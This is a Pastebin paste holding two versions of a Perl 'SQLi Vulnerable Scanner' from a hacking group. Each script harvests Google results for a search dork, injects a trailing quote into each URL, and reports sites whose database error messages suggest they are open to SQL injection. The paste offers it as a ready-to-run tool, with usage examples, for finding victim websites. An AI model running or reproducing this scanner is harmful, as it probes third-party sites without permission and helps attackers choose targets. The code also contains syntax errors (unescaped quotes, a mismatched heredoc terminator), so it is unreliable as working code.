Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- 1. script SQLi Vulnerable scanner perl version 0.0.2 :
- #!/usr/bin/perl
- # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
- # .:. Script : SQLi Vulnerable Scanner perl .:.
- # .:. Version : 0.0.1 created (03/26/2014) .:.
- # .:. Author : Dr.1n73ct10n .:.
- # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
- # .:. MySQL Injection .:.
- # .:. MSAccess Injection .:.
- # .:. MSSQL Injection .:.
- # .:. Oracle Injection .:.
- # .:. Blind Injection .:.
- # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
- # Useless version :
- # recode by Dr.1n73ct10n
- use LWP::UserAgent;
- use Getopt::Std;
- getopt('kpo', \%opts);
- if($opts{'k'} eq '')
- {
- print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
- }
- if($opts{'p'} eq '')
- {
- $opts{'p'} = 1;
- }
- print <<"Dr.1n73ct10n_intro";
- (_) _ _ _________ ___________
- | | | | | | /--------- ___________
- | | | | | | || coder by : | |
- | | | |------| | || Dr.1n73ct10n | |
- | | | |------| | ||________ | |
- |_| |_| |_| \--------- |_|
- intro_scan
- system('COLOR A');
- print "\n\n";
- print "h4x0ring ...\n";
- print "--------------------------\n\n";
- for($start = 0;$start != $opts{'p'}*10;$start += 10)
- {
- $t = "http://www.google.co.id/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
- $ua = LWP::UserAgent->new;
- $ua->timeout(10);
- $ua->env_proxy;
- $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
- $response = $ua->get($t);
- if ($response->is_success)
- {
- $c = $response->content;
- @stuff = split(/<a href=/,$c);
- foreach $line(@stuff)
- {
- if($line =~/(.*) class=l/ig)
- {
- $out = $1;
- $out =~ s/"//g;
- $out =~s/$/\'/;
- $ua = LWP::UserAgent->new;
- $ua->timeout(10);
- $ua->env_proxy;
- $response = $ua->get($out);
- $error = $response->content();
- if($error =~m/SQL syntax/)
- {print "$out Vulnerable MySQL!\n";}
- elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
- {print "$out Vulnerable MS Access!\n";}
- elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
- {print "$out Vulnerable MSSQL!\n";}
- elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
- {print "$out Vulnerable Blind Possible!\n";}
- elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
- {print "$out Vulnerable Oracle!\n";}
- }
- }
- }
- }
- 2. script SQLi Vulnerable scanner perl version 0.0.1 :
- #!/usr/bin/perl
- # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
- # .:. Script : SQLi Vulnerable Scanner .:.
- # .:. Version : 0.0.1 .:.
- # .:. Author : Dr.1n73ct10n .:.
- # .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
- # .:. MySQL Injection
- # .:. MSAccess Injection
- # .:. MSSQL Injection
- # .:. Oracle Injection
- # .:. Blind Injection
- #
- #
- use LWP::UserAgent;
- use Getopt::Std;
- getopt('kpo', \%opts);
- if($opts{'k'} eq '')
- {
- print "example:perl sql.pl -k intext:"mysql_fetch_array()"= -p 100\n";
- }
- if($opts{'p'} eq '')
- {
- $opts{'p'} = 1;
- }
- print "o0o0o0o00o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o\n";
- print "0 x90 o\n";
- print "o Gay Sql Scanner o\n";
- print "0 indonesiahackercyberteam.blogspot.com o\n";
- print "o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0o0\n";
- for($start = 0;$start != $opts{'p'}*10;$start += 10)
- {
- $t = "http://www.google.com/search?hl=en&q=".$opts{'k'}."&btnG=Search&start=".$start;
- $ua = LWP::UserAgent->new;
- $ua->timeout(10);
- $ua->env_proxy;
- $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
- $response = $ua->get($t);
- if ($response->is_success)
- {
- $c = $response->content;
- @stuff = split(/<a href=/,$c);
- foreach $line(@stuff)
- {
- if($line =~/(.*) class=l/ig)
- {
- $out = $1;
- $out =~ s/"//g;
- $out =~s/$/\'/;
- $ua = LWP::UserAgent->new;
- $ua->timeout(10);
- $ua->env_proxy;
- $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
- $response = $ua->get($out);
- $error = $response->content();
- if($error =~m/SQL syntax/)
- {
- print "$out:could be vulnerable!\n";
- }
- }
- }
- }
- }
- NB : software command : perl namefile.pl -k <dork> -p <page>
- example : perl sql.pl -k intext:"mysql_fetch_array()"= -p 100
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement